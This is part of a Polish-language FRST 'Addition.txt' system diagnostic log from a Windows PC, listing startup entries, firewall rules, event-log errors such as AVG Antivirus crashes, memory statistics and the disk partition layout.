C:\Windows\AsScrPro.exe MSCONFIG\startupreg: AthBtTray => "C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe" MSCONFIG\startupreg: CLMLServer => "C:\Program Files (x86)\CyberLink\Power2Go\CLMLSvc.exe" MSCONFIG\startupreg: GG => "C:\Users\Norbert\AppData\Local\GG\Application\gghub.exe" MSCONFIG\startupreg: RtHDVCpl => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s MSCONFIG\startupreg: SpybotSD TeaTimer => C:\Program Files (x86)\Spybot - Search & Destroy\TeaTimer.exe MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [{13D109FD-9785-4CDB-9999-C718FD0C6128}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe FirewallRules: [{5FA6CD2B-E5B3-40B9-904B-498FDFB5B0DD}] => (Allow) LPort=2869 FirewallRules: [{BE4F4636-8314-4F0B-8748-702AF44E6B57}] => (Allow) LPort=1900 FirewallRules: [{BA728B4A-BE4B-4C89-9928-6E17DAE5D7CA}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe FirewallRules: [{55A90296-D690-46AF-9E66-1C2971C93581}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe FirewallRules: [{C1DAE24A-8664-4E28-8F92-73F269EA01D8}] => (Allow) C:\Windows\SysWOW64\msiexec.exe FirewallRules: [{C6CD0B5B-B513-459A-8080-F335604C981C}] => (Allow) C:\Windows\SysWOW64\msiexec.exe FirewallRules: [{C13839AA-A94B-40CF-82EB-8D7CBC5CDA97}] => (Allow) C:\Windows\SysWOW64\msiexec.exe FirewallRules: [{51A70011-AF0A-4D99-911F-C4BE0B9B28EF}] => (Allow) C:\Windows\SysWOW64\msiexec.exe FirewallRules: [{834D4D1E-72C2-4C29-A05D-05E70CE392C6}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [{CDBB5FAE-B6D9-459C-94BA-C7556DAC703D}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe FirewallRules: [{7B184601-9FF5-4BCA-A7F6-44DC8BB5FCEC}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{7B43996A-8970-411A-90C9-4D4128136CCA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe ==================== Punkty Przywracania systemu ========================= ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Name: Teredo Tunneling Pseudo-Interface Description: Karta tunelowania Teredo firmy Microsoft Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318} Manufacturer: Microsoft Service: tunnel Problem: : This device cannot start. (Code10) Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device. On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard. ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (05/02/2017 02:23:35 PM) (Source: CVHSVC) (EventID: 100) (User: ) Description: Tylko informacje. (Stream product id=0x0066): Streaming Failed Error: (05/02/2017 02:23:05 PM) (Source: CVHSVC) (EventID: 100) (User: ) Description: Tylko informacje. Too many failures while downloading ranges: 2 Error: (05/02/2017 11:40:07 AM) (Source: CVHSVC) (EventID: 100) (User: ) Description: Tylko informacje. (Stream product id=0x0066): Streaming Failed Error: (05/02/2017 11:39:37 AM) (Source: CVHSVC) (EventID: 100) (User: ) Description: Tylko informacje. Too many failures while downloading ranges: 2 Error: (05/02/2017 08:16:40 AM) (Source: CVHSVC) (EventID: 100) (User: ) Description: Tylko informacje. (Stream product id=0x0066): Streaming Failed Error: (05/02/2017 08:16:10 AM) (Source: CVHSVC) (EventID: 100) (User: ) Description: Tylko informacje. Too many failures while downloading ranges: 2 Error: (05/01/2017 09:57:25 AM) (Source: CVHSVC) (EventID: 100) (User: ) Description: Tylko informacje. (Stream product id=0x0066): Streaming Failed Error: (05/01/2017 09:56:55 AM) (Source: CVHSVC) (EventID: 100) (User: ) Description: Tylko informacje. Too many failures while downloading ranges: 2 Error: (04/30/2017 08:10:46 AM) (Source: CVHSVC) (EventID: 100) (User: ) Description: Tylko informacje. (Stream product id=0x0066): Streaming Failed Error: (04/30/2017 08:10:16 AM) (Source: CVHSVC) (EventID: 100) (User: ) Description: Tylko informacje. Too many failures while downloading ranges: 2 Dziennik System: ============= Error: (05/02/2017 02:23:08 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa Apple Notifications Service zakończyła działanie; wystąpił następujący błąd: Nie można odnaleźć określonego modułu. Error: (05/02/2017 02:21:51 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 70. Error: (05/02/2017 02:20:18 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi PLAY ONLINE. OUC z powodu następującego błędu: Usługa nie odpowiada na sygnał uruchomienia lub sygnał sterujący w oczekiwanym czasie. Error: (05/02/2017 02:20:18 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą PLAY ONLINE. OUC. Error: (05/02/2017 11:40:45 AM) (Source: Service Control Manager) (EventID: 7032) (User: ) Description: Menedżer sterowania usługami próbował podjąć akcję korekcyjną (Uruchom skonfigurowany program odzyskiwania) po nieoczekiwanym zakończeniu usługi AVG Antivirus, ale ta akcja nie powiodła się przy następującym błędzie: Żaden program odzyskiwania nie został skonfigurowany dla tej usługi. . Error: (05/02/2017 11:40:45 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa AVG Antivirus niespodziewanie zakończyła pracę. Wystąpiło to razy: 3. W przeciągu 5000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom skonfigurowany program odzyskiwania. Error: (05/02/2017 11:40:36 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa AVG Antivirus niespodziewanie zakończyła pracę. Wystąpiło to razy: 2. W przeciągu 5000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (05/02/2017 11:40:34 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi avgbIDSAgent z powodu następującego błędu: Usługa nie odpowiada na sygnał uruchomienia lub sygnał sterujący w oczekiwanym czasie. Error: (05/02/2017 11:40:34 AM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą avgbIDSAgent. Error: (05/02/2017 11:40:29 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa AVG Service niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. CodeIntegrity: =================================== Date: 2017-02-06 18:40:29.996 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\iseguard64.dll because the set of per-page image hashes could not be found on the system. Date: 2017-02-06 18:22:50.183 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\iseguard64.dll because the set of per-page image hashes could not be found on the system. ==================== Statystyki pamięci =========================== Procesor: Intel(R) Pentium(R) CPU B960 @ 2.20GHz Procent pamięci w użyciu: 60% Całkowita pamięć fizyczna: 3873.14 MB Dostępna pamięć fizyczna: 1516.29 MB Całkowita pamięć wirtualna: 7744.46 MB Dostępna pamięć wirtualna: 5544.06 MB ==================== Dyski ================================ Drive c: (OS) (Fixed) (Total:119.24 GB) (Free:57.38 GB) NTFS ==>[system z komponentami startowymi (pozyskano odczytując dysk)] Drive d: (DATA) (Fixed) (Total:153.85 GB) (Free:142.54 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: E3102A4B) Partition 1: (Not Active) - (Size=25 GB) - (Type=1C) Partition 2: (Active) - (Size=119.2 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=153.9 GB) - (Type=07 NTFS) ==================== Koniec Addition.txt ============================